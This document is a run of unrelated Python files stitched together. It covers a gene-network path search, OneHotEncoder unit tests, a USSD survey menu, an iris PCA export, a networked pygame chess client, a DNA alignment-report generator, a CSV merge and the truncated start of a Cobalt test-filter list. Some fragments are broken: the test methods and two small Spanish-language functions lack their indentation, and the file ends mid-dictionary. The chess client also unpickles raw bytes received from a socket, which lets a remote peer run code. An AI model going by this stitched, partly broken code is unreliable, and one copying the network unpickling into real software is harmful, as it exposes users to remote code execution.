        if line_list[11] not in ['psi-mi:"MI:0915"(physical association)','psi-mi:"MI:0407"(direct interaction)']: continue
        g1 = line_list[0].split('locuslink:')[1]
        g2 = line_list[1].split('locuslink:')[1]
        # Skip pairs whose Entrez ids have no symbol mapping.
        if g1 not in entz2sym.keys() or g2 not in entz2sym.keys():
            continue
        # Write the interaction in both directions.
        out_file.write(entz2sym[g1]+'\t'+entz2sym[g2]+'\tPP\n')
        out_file.write(entz2sym[g2]+'\t'+entz2sym[g1]+'\tPP\n')
    read_file.close()
    print 'get transfac network'
    # TRANSFAC rows: TF <tab> pipe-separated list of target genes.
    read_file = open("../rawData/TRANSFAC.txt")
    for line in read_file.xreadlines():
        line_list = line.replace('\n','').replace('\r','').split('\t')
        if len(line_list) != 2:
            continue
        [tf, tgs] = line_list
        for tg in tgs.split('|'):
            out_file.write(tf+'\t'+tg+'\tPG\n')
    read_file.close()
    out_file.close()
def getNetInfo():
    # Load the PPI+TRANSFAC edge list into a directed graph; the 'weight'
    # edge attribute stores the edge type string ('PP' or 'PG').
    # NOTE(review): Python 2 (xreadlines).
    net = nx.DiGraph()
    in_file = open('../rawData/PPIandTRANSFAC.txt')
    for line in in_file.xreadlines():
        [stt, end, info] = line.replace('\n','').split('\t')
        net.add_edge(stt,end,weight=info)
    in_file.close()
    return net
if __name__ == '__main__':
    #makePPIandTransfacFile()
    net = getNetInfo()
    # Start from every MAP2K* kinase and report shortest paths to EIF4E that
    # consist of two protein-protein steps followed by one protein-gene step.
    stt_list = [sym for sym in net.nodes() if sym.startswith('MAP2K')]
    for stt in stt_list:
        if not nx.has_path(net, stt, 'EIF4E'): continue
        shPaths = list(nx.all_shortest_paths(net, stt, 'EIF4E'))
        for shPath in shPaths:
            # Edge-type signature of this path.
            info_list = []
            for ii in range(len(shPath)-1):
                info_list.append(net[shPath[ii]][shPath[ii+1]]['weight'])
            if info_list == ['PP','PP','PG']:
                print '##',shPath
|
import pandas as pd
import numpy as np
import unittest
from dstools.preprocessing.OneHotEncoder import OneHotEncoder
class TestOneHotEncoder(unittest.TestCase):
def compare_DataFrame(self, df_transformed, df_transformed_correct):
    """Assert two DataFrames have the same number of columns and, column by
    column, element-wise equal values; a pair of NaNs counts as equal.

    Fix: the original evaluated ``np.isnan(x)==True`` (non-idiomatic) and
    raised TypeError on non-numeric values such as strings; NaN detection
    is now guarded so such values fall through to the equality assert.
    """
    # Same number of columns.
    self.assertEqual(len(df_transformed.columns), len(df_transformed_correct.columns))
    # For every column in the correct DataFrame, compare every element.
    for column in df_transformed_correct.columns:
        for x, y in zip(df_transformed[column], df_transformed_correct[column]):
            try:
                # NaN != NaN, so two NaNs must be treated as equal explicitly.
                both_nan = np.isnan(x) and np.isnan(y)
            except TypeError:
                both_nan = False  # non-numeric values cannot be NaN
            if not both_nan:
                self.assertEqual(x, y)
def test_only_non_numeric(self):
    """Numeric columns pass through untouched; only string columns encode."""
    frame = pd.DataFrame({'x1':[1,2], 'x2':['a','b']})
    encoded = OneHotEncoder().fit_transform(frame)
    expected = pd.DataFrame({'x1':[1,2], 'x2_OHE_a':[1,0], 'x2_OHE_b':[0,1]})
    self.compare_DataFrame(encoded, expected)
def test_REST_class(self):
    """Values beyond the top-1 most frequent collapse into a REST column."""
    frame = pd.DataFrame({'x2':['a','a','b']})
    encoded = OneHotEncoder(number_of_top_values=1).fit_transform(frame)
    expected = pd.DataFrame({'x2_OHE_a':[1,1,0], 'x2_OHE_REST':[0,0,1]})
    self.compare_DataFrame(encoded, expected)
def test_no_REST_class(self):
    """With enough top values for every category, no REST column appears."""
    frame = pd.DataFrame({'x2':['a','a','b']})
    encoded = OneHotEncoder(number_of_top_values=2).fit_transform(frame)
    expected = pd.DataFrame({'x2_OHE_a':[1,1,0], 'x2_OHE_b':[0,0,1]})
    self.compare_DataFrame(encoded, expected)
def test_only_one_value(self):
    """A single-valued column encodes to one all-ones indicator column."""
    frame = pd.DataFrame({'x2':['a','a','a']})
    encoded = OneHotEncoder(number_of_top_values=2).fit_transform(frame)
    expected = pd.DataFrame({'x2_OHE_a':[1,1,1]})
    self.compare_DataFrame(encoded, expected)
def test_ignore_missing(self):
    """With dropna=True a missing value lands in the REST column."""
    frame = pd.DataFrame({'x2':['a','a',np.nan]})
    encoded = OneHotEncoder(number_of_top_values=2, dropna=True).fit_transform(frame)
    expected = pd.DataFrame({'x2_OHE_a':[1,1,0],'x2_OHE_REST':[0,0,1]})
    self.compare_DataFrame(encoded, expected)
def test_encode_missing(self):
    """
    With dropna=False a missing value should be encoded as its own column.
    """
    # np.NaN was removed in NumPy 2.0; np.nan is the same object.
    df = pd.DataFrame({'x2':['a','a',np.nan]})
    df_transformed_correct = pd.DataFrame({'x2_OHE_a':[1,1,0],'x2_OHE_nan':[0,0,1]})
    df_transformed = OneHotEncoder(number_of_top_values=2, dropna=False).fit_transform(df)
    self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_encode_missing_as_top_value(self):
    """
    A missing value that is the most frequent value should become its own
    encoded column while the real value falls into REST.
    """
    # np.NaN was removed in NumPy 2.0; np.nan is the same object.
    df = pd.DataFrame({'x2':['a',np.nan,np.nan]})
    df_transformed_correct = pd.DataFrame({'x2_OHE_nan':[0,1,1],'x2_OHE_REST':[1,0,0]})
    df_transformed = OneHotEncoder(number_of_top_values=1, dropna=False).fit_transform(df)
    self.compare_DataFrame(df_transformed, df_transformed_correct)
"""
a column that contains only missing values is totally unnecessary
"""
#def test_only_ignored_missing_values(self):
#df = pd.DataFrame({'x2':[np.NaN,np.NaN,np.NaN]})
#df_transformed_correct = pd.DataFrame({'x2':[np.NaN,np.NaN,np.NaN]})
#df_transformed = OneHotEncoder(number_of_top_values=1, dropna=False).fit_transform(df)
#self.compare_DataFrame(df_transformed, df_transformed_correct)
#def test_only_used_missing_values(self):
#df = pd.DataFrame({'x2':[np.NaN,np.NaN,np.NaN]})
#df_transformed_correct = pd.DataFrame({'x2_OHE_REST':[1,1,1]})
#df_transformed = OneHotEncoder(number_of_top_values=1, dropna=True).fit_transform(df)
#self.compare_DataFrame(df_transformed, df_transformed_correct)
def test_special_columns_less_values(self):
    """A per-column override below the global top-value count yields fewer columns plus REST."""
    frame = pd.DataFrame({'x2':['a','a','b']})
    expected = pd.DataFrame({'x2_OHE_a':[1,1,0], 'x2_OHE_REST':[0,0,1]})
    encoder = OneHotEncoder(number_of_top_values=2,special_columns={'x2':1})
    self.compare_DataFrame(encoder.fit_transform(frame), expected)
def test_special_columns_more_values(self):
    """A per-column override above the global top-value count yields extra columns."""
    frame = pd.DataFrame({'x2':['a','a','b']})
    expected = pd.DataFrame({'x2_OHE_a':[1,1,0], 'x2_OHE_b':[0,0,1]})
    encoder = OneHotEncoder(number_of_top_values=1, special_columns={'x2':2})
    self.compare_DataFrame(encoder.fit_transform(frame), expected)
def test_binary_encoded_column(self):
    """Two distinct values with compress_binary=True collapse into one 0/1 column."""
    frame = pd.DataFrame({'x2':['a','a','b']})
    expected = pd.DataFrame({'x2_a/b':[1,1,0]})
    encoder = OneHotEncoder(number_of_top_values=2, compress_binary=True)
    self.compare_DataFrame(encoder.fit_transform(frame), expected)
def test_binary_encoded_column_3_values(self):
    """
    compress_binary must not trigger for three effective classes; three
    indicator columns (including REST for the missing value) are expected.
    """
    # np.NaN was removed in NumPy 2.0; np.nan is the same object.
    df = pd.DataFrame({'x2':['a','a','b',np.nan]})
    df_transformed_correct = pd.DataFrame({'x2_OHE_a':[1,1,0,0], 'x2_OHE_b':[0,0,1,0],'x2_OHE_REST':[0,0,0,1]})
    df_transformed = OneHotEncoder(number_of_top_values=2, compress_binary=True, dropna=True).fit_transform(df)
    self.compare_DataFrame(df_transformed, df_transformed_correct)
if __name__ == '__main__':
    # Run the OneHotEncoder test suite when executed as a script.
    unittest.main()
from vumi.services.truteq.base import Publisher, Consumer, SessionType
from vumi.services.worker import PubSubWorker
from twisted.python import log
from alexandria.client import Client
from alexandria.sessions.backend import DBBackend
from alexandria.sessions.manager import SessionManager
from alexandria.sessions.db import models
from alexandria.sessions.db.views import _get_data
from alexandria.dsl.core import MenuSystem, prompt, end, case#, sms
from alexandria.dsl.validators import pick_one
"""
Issues that have surfaced when developing this:
1. Vumi does work with different transports but using different
transports in the same menu does not work. For example; sending out an SMS
in a USSD session. The menu items do not have access to the queue and
so cannot publish any message to a consumer.
2. We need a lazy evaluation decorator somewhere. Right now I have to pass
callables to make sure that stuff isn't evaluated too soon.
3. Using the session for string substitution is useful, but its implementation
with the explicit `parse=True` is silly.
4. The case((check, response), ...) works great on a lowlevel but is far
too wordy for everyday use.
5. I suspect there should be two types of session storage, one operational
for things like stack counters and one for the application for storing
things like responses to the questions. They should be able to be reset
apart from each other.
6. For a lot of the yield-ing I should probably be looking at something
like eventlet / greenlet / gevent
"""
# Answer options for the "what industry are you from?" question.
INDUSTRY_OPTIONS = (
    'Marketing',
    'Industry',
    'Retail',
    'Financial/Banking',
    'IT/Technology',
    'Media',
    'Other'
)
# Answer options for the "how are you finding the conference?" question.
EXPECTATIONS_OPTIONS = (
    'Meeting my expectations',
    'Exceeding my expectations',
    'Not meeting my expectations',
)
# Shown to returning users at each step; answer '2' ends the session.
CONTINUE_OR_QUIT_OPTIONS = (
    'Continue',
    'End the session'
)
# Final message shown whenever the session ends.
QUIT_MESSAGE = \
    'Thanks for taking part. You can view real-time statistics on ' + \
    'the Praekelt screens, or by dialing back into the Star menu ' + \
    'system!'
def sms(text):
    """
    Menu item coroutine intended to send an SMS to the current
    session's MSISDN.

    Not working (and never completed): see comment below.  Kept only as
    documentation of issue 1 in the module docstring.
    """
    while True:
        ms, session = yield
        # In its current form this isn't going to work since
        # these items don't have access to the queue and cannot
        # publish anything.
class VumiDBClient(Client):
    """Alexandria client with a DB-backed session, bridging vumi's
    USSD and SMS reply callbacks."""

    def __init__(self, msisdn, send_ussd_callback, send_sms_callback):
        self.id = msisdn
        self.session_manager = SessionManager(client=self, backend=DBBackend())
        self.session_manager.restore()
        self.send_ussd_callback = send_ussd_callback
        self.send_sms_callback = send_sms_callback

    def send(self, text, end_session=False):
        """Send USSD text to this client; close the session when asked."""
        reply_type = SessionType.end if end_session else SessionType.existing
        return self.send_ussd_callback(self.id, text, reply_type)

    def send_sms(self, text):
        """Send an SMS to this client's MSISDN."""
        return self.send_sms_callback(self.id, text)
def persist(key, value, *args, **kwargs):
    """
    Menu item coroutine: save a key, value pair in the session.

    If `value` is callable, the result of value(*args, **kwargs) is
    saved (evaluated lazily, when the menu reaches this item);
    otherwise `value` itself is saved.  Yields (False, False) to tell
    the menu system this item produces no output and expects no input.
    """
    while True:
        ms, session = yield
        if callable(value):
            # BUG FIX: args/kwargs were accepted but never forwarded, so
            # callers like persist('industry_stats', calculate_stats,
            # 'industry', INDUSTRY_OPTIONS) raised TypeError at runtime.
            session[key] = value(*args, **kwargs)
        else:
            session[key] = value
        yield False, False
def calculate_stats(key, options):
    """
    Build a per-option percentage summary for `key` from the stored
    answers.  Abuses the alexandria `_get_data` view for the database
    aggregation (acknowledged as ugly in the original).
    """
    counts = _get_data().get(key, {})
    total = float(sum(counts.values()))
    if not total:
        return "Not enough data yet"
    lines = []
    for option in options:
        share = (counts.get(option, 0) / total) * 100
        lines.append("%s: %.0f%%" % (option, share))
    return "\n".join(lines)
def returning_user(menu, session):
    """True once this user has completed the menu at least once."""
    return session.get('completed', False)


def new_user(*args, **kwargs):
    """A user is new exactly when they are not a returning user."""
    return not returning_user(*args, **kwargs)


def wants_to_quit(menu, session):
    """Consume the stored 'continue or quit' answer; '2' means quit."""
    return session.pop('continue_or_quit', None) == '2'
class VumiConsumer(Consumer):
    """
    USSD consumer running the conference-survey menu.

    First-time users answer the survey questions; returning users are
    shown live statistics instead, with the option to quit at each step.
    """
    menu = MenuSystem(
        # Step 1: greet.  New users give their name; returning users may
        # continue to the statistics or quit.
        case(
            (new_user, prompt('Welcome to the Praekelt Star menu system. ' +\
                'What is your first name?', save_as='name')),
            (returning_user, prompt('Welcome back %(name)s! Continue to ' +\
                'see the real-time statistics.',
                parse=True,
                options=CONTINUE_OR_QUIT_OPTIONS))
        ),
        case(
            (wants_to_quit, end(QUIT_MESSAGE)),
        ),
        # Pre-compute industry stats so the returning-user prompt below can
        # substitute them via %(industry_stats)s.
        persist('industry_stats', calculate_stats, 'industry', INDUSTRY_OPTIONS),
        case(
            (new_user, prompt('What industry are you from?',
                options=INDUSTRY_OPTIONS,
                save_as='industry',
                validator=pick_one)),
            (returning_user, prompt("%(industry_stats)s",
                parse=True,
                save_as='continue_or_quit',
                options=CONTINUE_OR_QUIT_OPTIONS))
        ),
        case(
            (wants_to_quit, end(QUIT_MESSAGE)),
        ),
        # Same pattern for the expectations question/statistics.
        persist('expectations_stats', calculate_stats, 'expectations', EXPECTATIONS_OPTIONS),
        case(
            (new_user, prompt('How are you finding the conference?',
                options=EXPECTATIONS_OPTIONS,
                save_as='expectations',
                validator=pick_one)),
            (returning_user, prompt("%(expectations_stats)s",
                parse=True,
                save_as='continue_or_quit',
                options=CONTINUE_OR_QUIT_OPTIONS))
        ),
        case(
            (wants_to_quit, end(QUIT_MESSAGE)),
        ),
        # Mark the survey complete so the next dial-in is a returning user.
        persist('completed', True),
        # sms(
        #     'Hi %(name)s want to know more about Vumi and Star menus? ' + \
        #     'Visit http://www.praekelt.com'
        # ),
        end(QUIT_MESSAGE)
    )

    def new_ussd_session(self, msisdn, message):
        # First message of a dial-in: build a DB-backed client and answer.
        client = VumiDBClient(msisdn, self.reply, self.reply_with_sms)
        client.answer(str(message), self.menu)

    def existing_ussd_session(self, msisdn, message):
        # Follow-up message within an open session.
        client = VumiDBClient(msisdn, self.reply, self.reply_with_sms)
        client.answer(str(message), self.menu)

    def timed_out_ussd_session(self, msisdn, message):
        log.msg('%s timed out, removing client' % msisdn)
        client = VumiDBClient(msisdn, self.reply, self.reply_with_sms)
        client.deactivate()

    def end_ussd_session(self, msisdn, message):
        log.msg('%s ended the session, removing client' % msisdn)
        client = VumiDBClient(msisdn, self.reply, self.reply_with_sms)
        client.deactivate()

    def reply_with_sms(self, msisdn, message):
        # Publish an outbound SMS message onto the queue.
        return self.publisher.send({
            "type": "sms",
            "msisdn": msisdn,
            "message": message
        })
class VumiUSSDWorker(PubSubWorker):
    """Worker wiring the survey consumer to the default publisher."""
    consumer_class = VumiConsumer
    publisher_class = Publisher
|
def potencia(op1,op2):
print("EL resultado de la potencia es: ",op1**op2)
def redondear(numero):
print("EL redonde el numero es: ",round(numero)) |
from sklearn.decomposition import PCA as sklearnPCA
from sklearn.preprocessing import StandardScaler
import pandas as pd
import numpy as np
import json
def create_file_json():
    """
    Download the iris dataset, standardise it, project it to 2-D with
    PCA, and dump the points (x, y, class label) to static/js/data2.json.
    """
    url = "https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data"
    # assign column names to the dataset
    names = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'Class']
    # read dataset to pandas dataframe
    df = pd.read_csv(url, names=names)
    # .ix was removed from pandas; .iloc is the positional equivalent.
    X = df.iloc[:, 0:4].values
    y = df.iloc[:, 4].values
    X_std = StandardScaler().fit_transform(X)
    sklearn_pca = sklearnPCA(n_components=2)
    Y_learn = sklearn_pca.fit_transform(X_std)
    matrix_label = np.matrix(y).transpose()
    matrix_feature = np.matrix(Y_learn)
    # One row per sample: [pca_x, pca_y, label]
    matrix_general = np.concatenate((matrix_feature, matrix_label), axis=1)
    points = []
    # Off-by-one fix: range(shape[0] - 1) silently dropped the last sample.
    for i in range(matrix_general.shape[0]):
        k = i * 3  # row-major offset into the flattened 3-column matrix
        d = {}
        d["x"] = matrix_general.item(k)
        d["y"] = matrix_general.item(k + 1)
        d["label"] = matrix_general.item(k + 2)
        points.append(d)
    with open('static/js/data2.json', 'w') as outfile:
        json.dump(points, outfile)
import pygame
from chess.constants import WIDTH, HEIGHT, CELL_SIZE, BLACK, button_font, RED
from chess.board import Board
from sys import exit
import socket
from threading import Thread
from tkinter import *
from pickle import loads, dumps
pygame.init()
# Module-level socket; set by click() once the user submits the server IP.
client = None
def click():
    """
    Read the server IP from the entry box and open the TCP connection.

    On success the dialog closes and the module-level `client` socket is
    connected; on a connection error the process exits with a message.
    """
    global client, e_ip, root
    SERVER = e_ip.get()
    PORT = 5050
    ADDR = (SERVER, PORT)
    try:
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client.connect(ADDR)
    except OSError:
        # Narrowed from a bare except: only socket errors mean the
        # server is unreachable.  Tk errors are no longer masked.
        root.destroy()
        exit("Server Error!")
    root.destroy()
# Tk dialog asking for the server IP (defaults to this machine's address).
root = Tk()
Label(root, text="IP: ").grid(row=0, column=0)
e_ip = Entry(root, width=50)
e_ip.grid(row=0, column=1)
e_ip.insert(0, socket.gethostbyname(socket.gethostname()))
Button(root, text="Submit", command=click).grid(row=2, column=0)
root.mainloop()
FPS = 60
# Fonts
font = pygame.font.SysFont("comicsans", 20)
# Main game window.
WIN = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Chess")
clock = pygame.time.Clock()
clock.tick(FPS)
# Shared state between the receive thread and the game loop.
board = None
events = None        # last batch of pygame events
msg = None           # latest message from the server (start signal / move list)
colour = None        # this player's colour, sent by the server
recv_colour = False  # protocol progress flags for recv_msg()
recv_start = False
piece = None         # pending pawn-promotion piece name from the opponent
def recv_msg():
    """
    Background thread: receive messages from the server forever.

    Protocol, in order:
      1. one byte   -> this player's colour
      2. five bytes -> the game-start message
      3. repeatedly: 28 bytes that are either a pickled move list or a
         utf-8, space-padded pawn-promotion piece name (distinguished by
         whether unpickling succeeds).
    """
    # Fix: the global statement listed `colour` twice.
    global client, msg, colour, recv_colour, recv_start, piece
    while True:
        if not recv_colour:
            colour = client.recv(1).decode('utf-8')
            recv_colour = True
        elif not recv_start:
            msg = client.recv(5)
            recv_start = True
        else:
            # recv() is outside the try so a socket failure no longer hits
            # the except branch with `data` unbound.
            data = client.recv(28)
            try:
                msg = loads(data)
            except Exception:
                # Not a pickled move list, so it is the padded piece name.
                piece = data.decode('utf-8')
def text_objects(text, font, colour, pos):
    """Render `text` in `colour` centred at `pos` onto the global window."""
    global WIN
    surface = font.render(text, True, colour)
    rect = surface.get_rect(center=pos)
    WIN.blit(surface, rect)
def button(text, x, y, w, h, colour, active_colour, action=None):
    """Draw a button; highlight it on hover and run `action` on mouse-up."""
    global events
    mx, my = pygame.mouse.get_pos()
    hovered = (x < mx < x + w) and (y < my < y + h)
    if hovered:
        pygame.draw.rect(WIN, active_colour, (x - 4, y - 4, w + 10, h + 10))
        for event in events:
            if event.type == pygame.MOUSEBUTTONUP and action is not None:
                action()
    else:
        pygame.draw.rect(WIN, colour, (x, y, w, h))
    text_objects(text, button_font, BLACK, ((x + (w // 2)), (y + (h // 2))))
def quit_game():
    """Shut pygame down and terminate the process."""
    pygame.quit()
    exit()
def main():
    """Main game loop: handle local clicks, apply opponent moves, redraw."""
    global WIN, events, board, colour, msg, client, piece
    running = True
    done = None
    board = Board(colour)
    r1 = r2 = c2 = c1 = None
    while running:
        events = pygame.event.get()
        for event in events:
            if event.type == pygame.QUIT:
                running = False
                quit_game()
            if event.type == pygame.MOUSEBUTTONUP and colour == board.turn:
                # Our turn: translate the click into a board cell.
                pos = pygame.mouse.get_pos()
                col = pos[0] // CELL_SIZE
                row = pos[1] // CELL_SIZE
                moves = board.select(row, col)
                if board.pawn_promo is not None:
                    # A pawn was promoted: send the piece name padded to the
                    # fixed 28-byte message size, then the move itself.
                    p = board.pawn_promo
                    p = (p + (" " * (28 - len(p)))).encode('utf-8')
                    client.send(p)
                    client.send(dumps(moves))
                    board.pawn_promo = None
                    r1 = r2 = c1 = c2 = None
                elif len(moves) == 2:
                    # A complete (from, to) move; send it to the opponent.
                    client.send(dumps(moves))
                    r1 = r2 = c1 = c2 = None
        if colour != board.turn and msg is not None:
            # Apply the opponent's move.  Coordinates are mirrored (7 - n)
            # because each player sees the board from their own side.
            moves = msg
            r1, c1 = moves[0]
            r2, c2 = moves[1]
            r1 = 7 - r1
            r2 = 7 - r2
            c1 = 7 - c1
            c2 = 7 - c2
            if piece is not None:
                # Opponent promoted a pawn: replay with the chosen piece.
                board.pawn_promo = piece.strip()
                board.select(r1, c1, False)
                board.select(r2, c2, False)
                piece = None
                board.pawn_promo = None
            else:
                board.select(r1, c1)
                board.select(r2, c2)
            msg = None
        if done is None:
            done = board.draw(WIN, r1, c1, r2, c2)
        elif done == 'cm' or done == 'sm':
            # NOTE(review): presumably checkmate/stalemate codes from
            # Board.draw -- confirm against the Board implementation.
            running = False
            return None
        pygame.display.update()
def wait():
    """Show a waiting screen until the server signals the game start."""
    global events, WIN, msg, thread, font
    running = True
    while running:
        events = pygame.event.get()
        for event in events:
            if event.type == pygame.QUIT:
                quit_game()
                running = False
        WIN.fill(BLACK)
        text_objects("Waiting for a opponent...", font, RED, (WIDTH//2, HEIGHT//2))
        if msg is not None:
            # The receive thread stored the start message: enter the game.
            msg = None
            main()
        pygame.display.update()
# Receive network messages on a background thread while the UI runs.
thread = Thread(target=recv_msg)
thread.start()
wait()
|
from openpyxl import Workbook
import os, sys
import numpy as np
import skbio.alignment, skbio.sequence
from xhtml2pdf import pisa
from .formatting import format_html, format_seq_line
# Route xhtml2pdf/pisa log output to the console during PDF generation.
pisa.showLogging()
def prep_excel(sequencing_dir, files, template_seq_name, excel_name='report.xlsx'):
    '''
    Extract the sequence from each sequencing file and generate a
    spreadsheet that matches each sequence with a template sequence and
    indicates whether it is a forward or reverse sequence.

    Parameters
    ----------
    sequencing_dir: str
        The path to the directory which contains all of the sequencing files
    files: iterable of str
        Names (within sequencing_dir) of the sequencing files to read
    template_seq_name: str
        The name of the file which contains the template sequence; a
        falsy value means no template (an empty template column is written)
    excel_name: str
        The name of the spreadsheet file to generate

    Returns
    -------
    The openpyxl Workbook that was saved to sequencing_dir/excel_name.
    '''
    # Make a spreadsheet and add the desired columns
    wb = Workbook()
    ws = wb.active
    ws.append(['Filename', 'Rev?', 'Construct', 'Sequence', 'Template Sequence'])
    print("Reading files in {}...\r".format(sequencing_dir))
    # Parse the template sequence (lower-cased, surrounding whitespace removed)
    if template_seq_name:
        with open(template_seq_name) as template_seq_file:
            template_seq = template_seq_file.read().lower().strip()
    else:
        template_seq = ''
    # Add a row for each sequence
    for file in files:
        filename = os.path.join(sequencing_dir, file)
        try:
            # Extract the actual sequence and add to spreadsheet
            with open(filename) as seq_file:
                seq = ''.join(x.strip() for x in seq_file.readlines()).lower()
            # 'rev' in the file name marks a reverse read
            isrev = 'rev' in file
            ws.append([file, isrev, template_seq_name or '', seq, template_seq])
        except (OSError, UnicodeDecodeError):
            # Narrowed from a bare except: only I/O and decoding problems
            # indicate a non-sequencing file in the directory.
            sys.exit('''Error occured with {}. Make sure there are only sequencing files in the directory.'''.format(filename))
    print("Generating {}...\r".format(os.path.join(sequencing_dir, excel_name)))
    # Save the file
    wb.save(os.path.join(sequencing_dir, excel_name))
    return wb
def get_match_str(a, b):
    """Return a match line for two equal-length strings: '|' where the
    characters agree, '-' where they differ."""
    return ''.join('|' if x == y else '-' for x, y in zip(a, b))
def gen_aligned_seqs(a):
    '''
    Generate formatted strings from the alignment object: the extended
    query sequence, the extended target sequence (each padded with '-'
    where only the other sequence has bases) and a '|'/'-' match line.

    parameters
    ----------
    a : skbio StripedSmithWaterman alignment result
        The alignment object holding query/target sequences and the
        begin/end indices of the aligned region

    returns
    -------
    (query_sequence_ex, target_sequence_ex, match_str) : tuple of str
    '''
    # The overhang length could be limited by the positioning of the aligned
    # regions within the query and target sequences
    start_overhang = min(a.query_begin, a.target_begin)
    end_overhang = min(len(a.query_sequence) - 1 - a.query_end,
        len(a.target_sequence) - 1 - a.target_end_optimal)
    # Get the overhanging strings
    # NOTE(review): the end slices stop at ...end + end_overhang (exclusive),
    # which looks like it drops the final overhang character -- confirm.
    query_overhangs = [
        a.query_sequence[a.query_begin-start_overhang:a.query_begin],
        a.query_sequence[a.query_end+1:a.query_end+end_overhang]
    ]
    target_overhangs = [
        a.target_sequence[a.target_begin-start_overhang:a.target_begin],
        a.target_sequence[a.target_end_optimal+1:a.target_end_optimal+end_overhang]
    ]
    # Add the overhangs to the aligned sequences
    query_sequence_ex = a.aligned_query_sequence.join(query_overhangs)
    target_sequence_ex = a.aligned_target_sequence.join(target_overhangs)
    # Fully extend sequences into 3' and 5', filling in the shorter ends with '-'
    if a.query_begin > a.target_begin:
        fragment_to_add = a.query_sequence[0:a.query_begin-start_overhang]
        query_sequence_ex = fragment_to_add + query_sequence_ex
        target_sequence_ex = len(fragment_to_add) * '-' + target_sequence_ex
    if a.query_begin < a.target_begin:
        fragment_to_add = a.target_sequence[0:a.target_begin-start_overhang]
        target_sequence_ex = a.target_sequence[0:a.target_begin-start_overhang] + target_sequence_ex
        query_sequence_ex = len(fragment_to_add) * '-' + query_sequence_ex
    if len(a.query_sequence) - 1 - a.query_end > len(a.target_sequence) - 1 - a.target_end_optimal:
        fragment_to_add = a.query_sequence[len(a.query_sequence) - 1 - a.query_end:len(a.query_sequence) - 1]
        query_sequence_ex += fragment_to_add
        target_sequence_ex += len(fragment_to_add) * '-'
    if len(a.query_sequence) - 1 - a.query_end < len(a.target_sequence) - 1 - a.target_end_optimal:
        fragment_to_add = a.target_sequence[len(a.target_sequence) - 1 - a.target_end_optimal:len(a.target_sequence) - 1]
        target_sequence_ex += fragment_to_add
        query_sequence_ex += len(fragment_to_add) * '-'
    # Generate the match string
    match_str = get_match_str(query_sequence_ex, target_sequence_ex)
    return query_sequence_ex, target_sequence_ex, match_str
def gen_reports(sequencing_dir, wb, line_length=100):
    '''
    Take an excel spreadsheet containing alignment inputs, generate the
    alignments, and produce a .pdf file for each alignment.

    parameters
    ----------
    sequencing_dir : str
        The path to the directory which contains all of the sequencing files
    wb : openpyxl workbook object
        The spreadsheet which contains the alignment input data
    line_length : int
        The number of characters per each line in the formatted alignment
    '''
    # Make the reports directory
    report_dirname = os.path.join(sequencing_dir, 'reports')
    print('Generating {}.'.format(report_dirname))
    os.mkdir(report_dirname)
    # Get rows and column labels from the spreadsheet.
    # Fix: Workbook.get_active_sheet() is deprecated (removed in
    # openpyxl 3.x); the `active` property is the replacement.
    ws = wb.active
    rows = list(ws.rows)
    header = list(map(lambda x: x.value, rows.pop(0)))
    # Make a custom substitution matrix to allow alignments of sequences
    # containing 'N' (unknown) nucleotides
    mtrx = skbio.alignment.make_identity_substitution_matrix(1, -2, alphabet='ACGTN')
    # Iterate through the rows
    for row in rows:
        # Make row into a dict with column name as the index
        row_vals = map(lambda x: x.value, row)
        row_dict = dict(zip(header, row_vals))
        # Convert to reverse complement if reverse sequence
        if row_dict['Rev?']:
            sequence = skbio.sequence.DNA(row_dict['Sequence'].strip(), lowercase=True).reverse_complement()
            row_dict['Sequence'] = str(sequence)
        # Generate alignment
        print("Aligning {} to {}\r".format(row_dict['Filename'], row_dict['Construct']))
        a = skbio.alignment.StripedSmithWaterman(row_dict['Sequence'].lower())(row_dict['Template Sequence'].lower())
        # Get the sequence position where the alignment starts
        query_begin = a.query_begin
        target_begin = a.target_begin
        # format alignment
        query_sequence, target_sequence, match_str = gen_aligned_seqs(a)
        # Initialize formatted alignment string
        seq = ''
        # Split the alignment up into fragments according to line_length and format
        for i in range(len(query_sequence) // line_length + 1):
            a_line = query_sequence[0+i*line_length:line_length+i*line_length]
            b_line = target_sequence[0+i*line_length:line_length+i*line_length]
            match = match_str[0+i*line_length:line_length+i*line_length]
            # Determine the actual sequence length covered by the line
            # ('-' padding does not consume sequence positions)
            a_length = len(a_line) - a_line.count('-')
            b_length = len(b_line) - b_line.count('-')
            # Format
            seq += format_seq_line(a_line, b_line, match,
                (query_begin, query_begin+a_length-1),
                (target_begin, target_begin+b_length-1))
            # Increment length
            query_begin += a_length
            target_begin += b_length
    # Prepare into html file
        html = format_html(row_dict['Filename'], row_dict['Construct'], seq)
        # Generate .pdf file
        basename = row_dict['Filename'].split('.')[0]
        report_filename = os.path.join(report_dirname, '{}.pdf'.format(basename))
        with open(report_filename, "w+b") as reportFile:
            # convert HTML to PDF
            pisaStatus = pisa.CreatePDF(
                html,
                dest=reportFile)
__author__ = 'pablo'
# Merge two age-annotation CSVs into one file with rows of
# (image name, age, individual id).
data = []
with open('chalearn_full_db.csv', 'r') as f:
    lines = f.readlines()
    # NOTE(review): unpacking assumes exactly 4 comma-separated fields
    # per line -- confirm against the CSV format.
    for l in lines:
        name, real, age, _ = l.split(',')
        # chalearn images have no individual identity: use '-1'
        data.append([name, age, '-1'])
with open('fgnet.csv', 'r') as f:
    lines = f.readlines()
    for l in lines:
        age, ind, name, _ = l.split(',')
        data.append([name, age, ind])
# Write the merged rows out as CSV.
with open('fgnet_chalearn_apparent_db.csv', 'w') as f:
    for img in data:
        f.write(','.join(img) + '\n')
# Copyright 2022 The Cobalt Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starboard Linux Platform Test Filters."""
import os
from starboard.tools import paths
from starboard.tools.testing import test_filter
# pylint: disable=line-too-long
# pylint: disable=line-too-long
# Tests filtered out when running a modular (Evergreen-style) build.
_MODULAR_BUILD_FILTERED_TESTS = {
    'nplb': [
        'MultiplePlayerTests/*/*sintel_329_ec3_dmp*',
        'MultiplePlayerTests/*/*sintel_381_ac3_dmp*',
